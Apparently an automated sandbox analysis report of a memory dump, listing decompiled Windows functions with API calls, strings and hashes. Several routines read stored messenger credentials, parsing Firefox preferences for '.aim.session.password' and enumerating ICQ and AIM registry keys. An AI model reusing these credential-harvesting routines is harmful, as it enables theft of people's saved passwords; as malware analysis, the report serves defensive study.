					_push(_a12);
					E00408D47();
					DestroyMenu(_t46);
				}
				return 1;
			}










                                0x00408eb2
                                0x00408ebc
                                0x00408f06
                                0x00408f0c
                                0x00408f17
                                0x00408f2d
                                0x00408f2e
                                0x00408f3b
                                0x00408f5c
                                0x00408f66
                                0x00408f6c
                                0x00408f7d
                                0x00408f89
                                0x00408f97
                                0x00408f9d
                                0x00408fa5
                                0x00408fac
                                0x00408f19
                                0x00408f27
                                0x00408f27
                                0x00408f2b
                                0x00000000
                                0x00000000
                                0x00408f1e
                                0x00408f24
                                0x00000000
                                0x00408f24
                                0x00000000
                                0x00408f1e
                                0x00000000
                                0x00408f27
                                0x00408fb3
                                0x00408fb3
                                0x00408ebe
                                0x00408ebe
                                0x00408ecb
                                0x00408ed9
                                0x00408edf
                                0x00408ee6
                                0x00408ee8
                                0x00408eea
                                0x00408eeb
                                0x00408eee
                                0x00408ef7
                                0x00408ef7
                                0x00408fb9

                                APIs
                                • sprintf.MSVCRT ref: 00408ECB
                                • LoadMenuA.USER32(?,?), ref: 00408ED9
                                  • Part of subcall function 00408D47: GetMenuItemCount.USER32(?), ref: 00408D5C
                                  • Part of subcall function 00408D47: memset.MSVCRT ref: 00408D7D
                                  • Part of subcall function 00408D47: GetMenuItemInfoA.USER32 ref: 00408DB8
                                  • Part of subcall function 00408D47: strchr.MSVCRT ref: 00408DCF
                                • DestroyMenu.USER32(00000000), ref: 00408EF7
                                • sprintf.MSVCRT ref: 00408F3B
                                • CreateDialogParamA.USER32(?,00000000,00000000,00408EA5,00000000), ref: 00408F50
                                • memset.MSVCRT ref: 00408F6C
                                • GetWindowTextA.USER32(00000000,?,00001000), ref: 00408F7D
                                • EnumChildWindows.USER32(00000000,Function_00008E37,00000000), ref: 00408FA5
                                • DestroyWindow.USER32(00000000), ref: 00408FAC
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                • String ID: caption$dialog_%d$menu_%d
                                • API String ID: 3259144588-3822380221
                                • Opcode ID: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                • Instruction ID: 6ff3f41c44f65ef1366d905bf4693a1cca8442fec54ce1cacb3646534aec100a
                                • Opcode Fuzzy Hash: 79a18ef8771b5b5c838dbf36fccf1d46debdbf94abfec0b08ecdefeebec5252c
                                • Instruction Fuzzy Hash: 3B210F72500248FFDB12AF60DD45EEB3B69EB84709F14407EFA85A2190DA7949808B6D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409068, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 72COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00409068(void* __eflags, struct HINSTANCE__* _a4, intOrPtr _a8) {
				void _v4103;
				char _v4104;
				int _t18;
				void* _t20;
				void* _t25;
				int _t27;
				void* _t29;

				0x414060();
				0x413d0c(0x41e200, _a8, _t25, _t29, _t20);
				0x413d0c(0x41e308, "general");
				E00408CA1("TranslatorName", 0x417c88);
				E00408CA1("TranslatorURL", 0x417c88);
				E00408CA1("Version", 0x417c88);
				EnumResourceNamesA(_a4, 4, E00408EAA, 0);
				EnumResourceNamesA(_a4, 5, E00408EAA, 0);
				0x413d0c(0x41e308, "strings");
				_t27 = 0;
				_v4104 = 0;
				memset( &_v4103, 0, 0x1000);
				do {
					_t18 = LoadStringA(_a4, _t27,  &_v4104, 0x1000);
					if(_t18 > 0) {
						_t18 = E00408D0F(_t27,  &_v4104);
					}
					_t27 = _t27 + 1;
				} while (_t27 <= 0xffff);
				 *0x41e200 = 0;
				return _t18;
			}










                                0x00409070
                                0x00409080
                                0x00409090
                                0x004090a0
                                0x004090ab
                                0x004090b6
                                0x004090d1
                                0x004090db
                                0x004090e3
                                0x004090ee
                                0x004090f8
                                0x004090ff
                                0x00409107
                                0x00409113
                                0x0040911b
                                0x00409125
                                0x0040912b
                                0x0040912c
                                0x0040912d
                                0x00409137
                                0x00409140

                                APIs
                                • _mbscpy.MSVCRT ref: 00409080
                                • _mbscpy.MSVCRT ref: 00409090
                                  • Part of subcall function 00408CA1: memset.MSVCRT ref: 00408CC6
                                  • Part of subcall function 00408CA1: GetPrivateProfileStringA.KERNEL32(0041E308,?,00417C88,?,00001000,0041E200), ref: 00408CEA
                                  • Part of subcall function 00408CA1: WritePrivateProfileStringA.KERNEL32(0041E308,?,?,0041E200), ref: 00408D01
                                • EnumResourceNamesA.KERNEL32(?,00000004,Function_00008EAA,00000000), ref: 004090D1
                                • EnumResourceNamesA.KERNEL32(?,00000005,Function_00008EAA,00000000), ref: 004090DB
                                • _mbscpy.MSVCRT ref: 004090E3
                                • memset.MSVCRT ref: 004090FF
                                • LoadStringA.USER32(?,00000000,?,00001000), ref: 00409113
                                  • Part of subcall function 00408D0F: _itoa.MSVCRT ref: 00408D30
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                • String ID: TranslatorName$TranslatorURL$Version$general$strings
                                • API String ID: 1035899707-2179912348
                                • Opcode ID: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                • Instruction ID: 8f59c47c41e75b0ef1e028ad246d3c9450943cc5e9d1e56adfa21ee2aa94ac58
                                • Opcode Fuzzy Hash: 0e67f2f42cdfcc6d6620761b8a7d89372e721f023a66968946340eb0cc98dc02
                                • Instruction Fuzzy Hash: 4211E93164025879E7212717EC4AFCB3E6C9F85B59F14407FBA49BA0C1CABD99C086BC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041102B, Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,0041115C,00404495,00000000,00000000,00000000), ref: 0041103A
                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00411053
                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00411064
                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00411075
                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00411086
                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 00411097
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$HandleModule
                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                • API String ID: 667068680-3953557276
                                • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00405C4E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 56%
                                			E00405C4E(signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct tagRECT _v68;
				void _v323;
				char _v324;
				intOrPtr _v4612;
				char _v8864;
				struct HWND__* _v10984;
				void* __ebx;
				_Unknown_base(*)()* _t75;
				void* _t78;
				struct HINSTANCE__* _t91;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr* _t106;
				intOrPtr _t107;
				void* _t109;
				void* _t110;

				0x414060();
				_v12 = 8;
				SetRect( &_v68, 1, 1, 1, 1);
				if(MapDialogRect( *(_a4 + 4),  &_v68) != 0) {
					_v12 = _v68.top << 2;
				}
				_v8 = _v8 & 0;
				_v32 = 0x3ed;
				_v28 = 0x3ef;
				_v24 = 0x3ee;
				_v20 = 0x3f0;
				asm("stosd");
				_v52 = 0xb02c;
				_v48 = 0xb090;
				_v44 = 0xb0f4;
				_v40 = 0xb158;
				asm("stosd");
				_t99 =  &_v8864;
				do {
					E00402AA8(_a4,  *((intOrPtr*)(_t109 + _v8 - 0x1c)));
					0x4134d0();
					_v8 = _v8 + 4;
					 *_t99 =  *((intOrPtr*)(_t109 + _v8 - 0x30));
					_t99 = _t99 + 0x854;
				} while (_v8 < 0x14);
				_v8 = _v8 & 0x00000000;
				do {
					_a4 = _a4 & 0x00000000;
					do {
						_t101 = _a4 * 0x854;
						_t106 = _t109 + _t101 - 0x2ae4;
						0x4135a8();
						if(_a4 == 0) {
							_v324 = 0;
							memset( &_v323, 0, 0xff);
							_push(E0040876F(_v8 + 0x515));
							sprintf( &_v324, "%s:");
							_t110 = _t110 + 0x18;
							SetWindowTextA(_v10984,  &_v324);
						}
						_t107 =  *_t106;
						_t91 = LoadLibraryA("shlwapi.dll");
						_t75 = GetProcAddress(_t91, "SHAutoComplete");
						if(_t75 != 0) {
							 *_t75(_t107, 0x10000001);
						}
						FreeLibrary(_t91);
						 *((intOrPtr*)(_t109 + _t101 - 0x229c)) =  *((intOrPtr*)(_t109 + _t101 - 0x229c)) + 1;
						_t78 = _v4612 + _v12;
						 *((intOrPtr*)(_t109 + _t101 - 0x22a0)) =  *((intOrPtr*)(_t109 + _t101 - 0x22a0)) + _t78;
						_a4 = _a4 + 1;
					} while (_a4 < 5);
					_v8 = _v8 + 1;
				} while (_v8 < 7);
				return _t78;
			}































                                0x00405c56
                                0x00405c66
                                0x00405c6d
                                0x00405c85
                                0x00405c8d
                                0x00405c8d
                                0x00405c95
                                0x00405c9b
                                0x00405ca2
                                0x00405ca9
                                0x00405cb0
                                0x00405cb7
                                0x00405cbb
                                0x00405cc2
                                0x00405cc9
                                0x00405cd0
                                0x00405cd7
                                0x00405cd8
                                0x00405cde
                                0x00405ce8
                                0x00405cf5
                                0x00405d01
                                0x00405d05
                                0x00405d07
                                0x00405d0d
                                0x00405d13
                                0x00405d17
                                0x00405d17
                                0x00405d1b
                                0x00405d1e
                                0x00405d24
                                0x00405d2b
                                0x00405d34
                                0x00405d44
                                0x00405d4b
                                0x00405d61
                                0x00405d6e
                                0x00405d73
                                0x00405d83
                                0x00405d83
                                0x00405d89
                                0x00405d96
                                0x00405d9e
                                0x00405da6
                                0x00405dae
                                0x00405dae
                                0x00405db1
                                0x00405db7
                                0x00405dc7
                                0x00405dd0
                                0x00405dd2
                                0x00405dd5
                                0x00405ddf
                                0x00405de2
                                0x00405df0

                                APIs
                                • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                • MapDialogRect.USER32(?,?), ref: 00405C7D
                                • memset.MSVCRT ref: 00405D4B
                                • sprintf.MSVCRT ref: 00405D6E
                                • SetWindowTextA.USER32(?,?), ref: 00405D83
                                • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
                                • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                • String ID: %s:$SHAutoComplete$shlwapi.dll
                                • API String ID: 2601263068-2802052640
                                • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411BA1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63librarystringloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                • strlen.MSVCRT ref: 00411C15
                                • strlen.MSVCRT ref: 00411C22
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressHandleModuleProcstrlen
                                • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
                                • API String ID: 1027343248-251837621
                                • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
                                • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004121C1, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy
                                • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                • API String ID: 714388716-318151290
                                • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
                                • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040E293, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 167fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 68%
                                			E0040E293(void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				char _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v284;
				char _v540;
				void _v1553;
				void _v1563;
				char _v1564;
				void _v2588;
				char _v3611;
				void _v3612;
				void* __ebx;
				void* __edi;
				void* _t52;
				int _t57;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t83;
				intOrPtr* _t88;
				intOrPtr _t105;
				char _t107;
				void* _t109;
				int _t113;
				long _t116;
				void* _t117;
				void* _t118;
				intOrPtr* _t119;
				void* _t120;

				_t52 = E004067BA(_a8);
				_pop(_t95);
				_v8 = _t52;
				if(_t52 != 0xffffffff) {
					_t116 = GetFileSize(_t52, 0);
					if(_t116 < 0x100000) {
						_t3 = _t116 + 1; // 0x1
						_t57 = _t3;
						0x413d5c();
						_t109 = _t57;
						 *_t119 = 0x3ff;
						_v16 = _t109;
						_v12 = 0;
						_v1564 = 0;
						memset( &_v1563, 0, _t57);
						_t120 = _t119 + 0xc;
						 *_t109 = 0;
						ReadFile(_v8, _t109, _t116,  &_v20, 0);
						 *((char*)(_t109 + _t116)) = 0;
						while(1) {
							_t64 = E00407193(_t109, _t95,  &_v1564, 0x3ff,  &_v12);
							_t120 = _t120 + 0xc;
							if(_t64 == 0) {
								break;
							}
							_t66 = E00407139(0, "user_pref("");
							_pop(_t95);
							if(_t66 == 0) {
								_push(0x417ddc);
								_t67 = 0xb;
								_t13 = E00407139(_t67) - 0xb; // -11
								_t95 = _t13;
								_a8 = _t95;
								if(_t95 > 0) {
									_t117 = E00407139(E00407139(_t68 + 1, 0x417de4) + 1, 0x417ddc);
									_pop(_t95);
									if(_t117 > 0) {
										_t17 = _t117 + 1; // 0x1
										_t113 = E00407139(_t17, 0x417ddc) - _t117 - 1;
										_pop(_t95);
										if(_t113 > 0) {
											memcpy( &_v2588,  &_v1553, _a8);
											 *((char*)(_t118 + _a8 - 0xa18)) = 0;
											memcpy( &_v3612, _t118 + _t117 - 0x617, _t113);
											_t95 =  &_v2588;
											 *((char*)(_t118 + _t113 - 0xe18)) = 0;
											_t83 = E00407139(0, ".aim.session.password");
											_t120 = _t120 + 0x1c;
											if(_t83 > 0) {
												 *((char*)(_t118 + _t83 - 0xa18)) = 0;
												_v540 = 0;
												_v284 = 0;
												_v28 = 0;
												_v24 = 0;
												E00406958(0xff,  &_v540,  &_v2588);
												E004029D9( &_v3611,  &_v284, 0xff);
												_t107 = _v540;
												_t105 = 2;
												_v28 = _t105;
												_t88 =  &_v540;
												while(_t107 != 0) {
													if(_t107 < 0x30 || _t107 > 0x39) {
														_v24 = _t105;
													} else {
														_t88 = _t88 + 1;
														_t107 =  *_t88;
														continue;
													}
													L15:
													_t95 = _a4;
													 *((intOrPtr*)( *_a4))( &_v540);
													goto L16;
												}
												_v24 = 3;
												goto L15;
											}
										}
									}
								}
							}
							L16:
							_t109 = _v16;
						}
						0x413d56(_t109);
					}
					CloseHandle(_v8);
				}
				return 1;
			}



































                                0x0040e2a2
                                0x0040e2aa
                                0x0040e2ab
                                0x0040e2ae
                                0x0040e2be
                                0x0040e2c6
                                0x0040e2cc
                                0x0040e2cc
                                0x0040e2d0
                                0x0040e2d5
                                0x0040e2d7
                                0x0040e2e6
                                0x0040e2e9
                                0x0040e2ec
                                0x0040e2f2
                                0x0040e2f7
                                0x0040e304
                                0x0040e306
                                0x0040e30c
                                0x0040e47a
                                0x0040e48c
                                0x0040e491
                                0x0040e496
                                0x00000000
                                0x00000000
                                0x0040e321
                                0x0040e328
                                0x0040e329
                                0x0040e334
                                0x0040e337
                                0x0040e344
                                0x0040e344
                                0x0040e34b
                                0x0040e34e
                                0x0040e372
                                0x0040e377
                                0x0040e378
                                0x0040e37e
                                0x0040e391
                                0x0040e394
                                0x0040e395
                                0x0040e3ac
                                0x0040e3b4
                                0x0040e3cb
                                0x0040e3d7
                                0x0040e3dd
                                0x0040e3e4
                                0x0040e3e9
                                0x0040e3ee
                                0x0040e3f4
                                0x0040e401
                                0x0040e407
                                0x0040e40d
                                0x0040e410
                                0x0040e41f
                                0x0040e431
                                0x0040e436
                                0x0040e440
                                0x0040e441
                                0x0040e444
                                0x0040e459
                                0x0040e44f
                                0x0040e466
                                0x0040e456
                                0x0040e456
                                0x0040e457
                                0x00000000
                                0x0040e457
                                0x0040e469
                                0x0040e469
                                0x0040e475
                                0x00000000
                                0x0040e475
                                0x0040e45d
                                0x00000000
                                0x0040e45d
                                0x0040e3ee
                                0x0040e395
                                0x0040e378
                                0x0040e34e
                                0x0040e477
                                0x0040e477
                                0x0040e477
                                0x0040e49d
                                0x0040e4a2
                                0x0040e4a6
                                0x0040e4a6
                                0x0040e4b3

                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
                                • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
                                • memset.MSVCRT ref: 0040E2F2
                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
                                • memcpy.MSVCRT ref: 0040E3AC
                                • memcpy.MSVCRT ref: 0040E3CB
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
                                • CloseHandle.KERNEL32(?), ref: 0040E4A6
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
                                • String ID: .aim.session.password$user_pref("
                                • API String ID: 1009687194-2166142864
                                • Opcode ID: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
                                • Opcode Fuzzy Hash: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D794, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 35%
                                			E0040D794(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				char _v12;
				int _v16;
				void* _v20;
				long _v24;
				int _v28;
				char _v44;
				void _v303;
				char _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				char _v568;
				char _v824;
				void _v1079;
				int _v1080;
				void* __ebx;
				void** _t45;
				char* _t49;
				long _t51;
				long _t55;
				long _t62;
				long _t68;
				int _t70;
				int _t76;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t45 =  &_a8;
				_v24 = 1;
				0x411d68(_a8, "Software\Mirabilis\ICQ\NewOwners", _t45);
				_t79 = _t78 + 0xc;
				if(_t45 == 0) {
					_t70 = 0;
					_v12 = 0;
					_v304 = 0;
					memset( &_v303, 0, 0xff);
					_t80 = _t79 + 0xc;
					_t49 =  &_v304;
					_push(_t49);
					_push(0);
					while(1) {
						0x411dee(_a8);
						_t81 = _t80 + 0xc;
						if(_t49 != 0) {
							break;
						}
						_t51 =  &_v304;
						0x411d68(_a8, _t51,  &_v20);
						_t80 = _t81 + 0xc;
						__eflags = _t51;
						if(_t51 != 0) {
							L10:
							_t38 =  &_v12;
							 *_t38 = _v12 + 1;
							__eflags =  *_t38;
							_t49 =  &_v304;
							_push(_t49);
							_push(_v12);
							continue;
						} else {
							_v16 = 0x10;
							_t55 = RegQueryValueExA(_v20, "MainLocation", _t70,  &_v28,  &_v44,  &_v16);
							__eflags = _t55;
							if(_t55 != 0) {
								L9:
								RegCloseKey(_v20);
								goto L10;
							} else {
								_t76 = atoi( &_v304);
								__eflags = _t76 - _t70;
								if(_t76 <= _t70) {
									goto L9;
								} else {
									__eflags = _v16 - 8;
									if(__eflags < 0) {
										goto L9;
									} else {
										_v1080 = _t70;
										memset( &_v1079, _t70, 0xff);
										_t80 = _t80 + 0xc;
										_t62 = E0040807D( &_v1080, __eflags, _t76, _a12,  &_v44, _v16);
										__eflags = _t62;
										if(_t62 == 0) {
											L8:
											_t70 = 0;
											__eflags = 0;
											goto L9;
										} else {
											_v824 = 0;
											_v568 = 0;
											_v312 = 0;
											_v308 = 0;
											0x413d0c( &_v568,  &_v1080);
											0x413d0c( &_v824,  &_v304);
											_t80 = _t80 + 0x10;
											_v308 = 3;
											_v312 = 8;
											_t68 =  *((intOrPtr*)( *_a4))( &_v824);
											__eflags = _t68;
											_v24 = _t68;
											if(_t68 != 0) {
												goto L8;
											}
										}
									}
								}
							}
						}
						break;
					}
					RegCloseKey(_a8);
				}
				return _v24;
			}






























                                0x0040d7a0
                                0x0040d7ac
                                0x0040d7b3
                                0x0040d7b8
                                0x0040d7bd
                                0x0040d7c3
                                0x0040d7d3
                                0x0040d7d6
                                0x0040d7dc
                                0x0040d7e1
                                0x0040d7e4
                                0x0040d7ea
                                0x0040d7eb
                                0x0040d90f
                                0x0040d912
                                0x0040d917
                                0x0040d91c
                                0x00000000
                                0x00000000
                                0x0040d7f5
                                0x0040d7ff
                                0x0040d804
                                0x0040d807
                                0x0040d809
                                0x0040d902
                                0x0040d902
                                0x0040d902
                                0x0040d902
                                0x0040d905
                                0x0040d90b
                                0x0040d90c
                                0x00000000
                                0x0040d80f
                                0x0040d824
                                0x0040d82b
                                0x0040d831
                                0x0040d833
                                0x0040d8f9
                                0x0040d8fc
                                0x00000000
                                0x0040d839
                                0x0040d845
                                0x0040d847
                                0x0040d84a
                                0x00000000
                                0x0040d850
                                0x0040d850
                                0x0040d854
                                0x00000000
                                0x0040d85a
                                0x0040d863
                                0x0040d869
                                0x0040d86e
                                0x0040d882
                                0x0040d887
                                0x0040d889
                                0x0040d8f7
                                0x0040d8f7
                                0x0040d8f7
                                0x00000000
                                0x0040d88b
                                0x0040d89b
                                0x0040d8a1
                                0x0040d8a7
                                0x0040d8ad
                                0x0040d8b3
                                0x0040d8c6
                                0x0040d8d0
                                0x0040d8da
                                0x0040d8e4
                                0x0040d8ee
                                0x0040d8f0
                                0x0040d8f2
                                0x0040d8f5
                                0x00000000
                                0x00000000
                                0x0040d8f5
                                0x0040d889
                                0x0040d854
                                0x0040d84a
                                0x0040d833
                                0x00000000
                                0x0040d809
                                0x0040d925
                                0x0040d925
                                0x0040d932

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                • atoi.MSVCRT ref: 0040D840
                                • memset.MSVCRT ref: 0040D869
                                • _mbscpy.MSVCRT ref: 0040D8B3
                                • _mbscpy.MSVCRT ref: 0040D8C6
                                • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                • memset.MSVCRT ref: 0040D7DC
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
                                • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
                                • API String ID: 2897902629-2277304809
                                • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
                                • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411172, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                Download Yara Rule
                                APIs
                                • strchr.MSVCRT ref: 0041118A
                                • _mbscpy.MSVCRT ref: 00411198
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                  • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                  • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                • _mbscpy.MSVCRT ref: 004111E8
                                • _mbscat.MSVCRT ref: 004111F3
                                • memset.MSVCRT ref: 004111CF
                                  • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                  • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
                                • memset.MSVCRT ref: 00411217
                                • memcpy.MSVCRT ref: 00411232
                                • _mbscat.MSVCRT ref: 0041123D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                • String ID: \systemroot
                                • API String ID: 912701516-1821301763
                                • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
                                • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
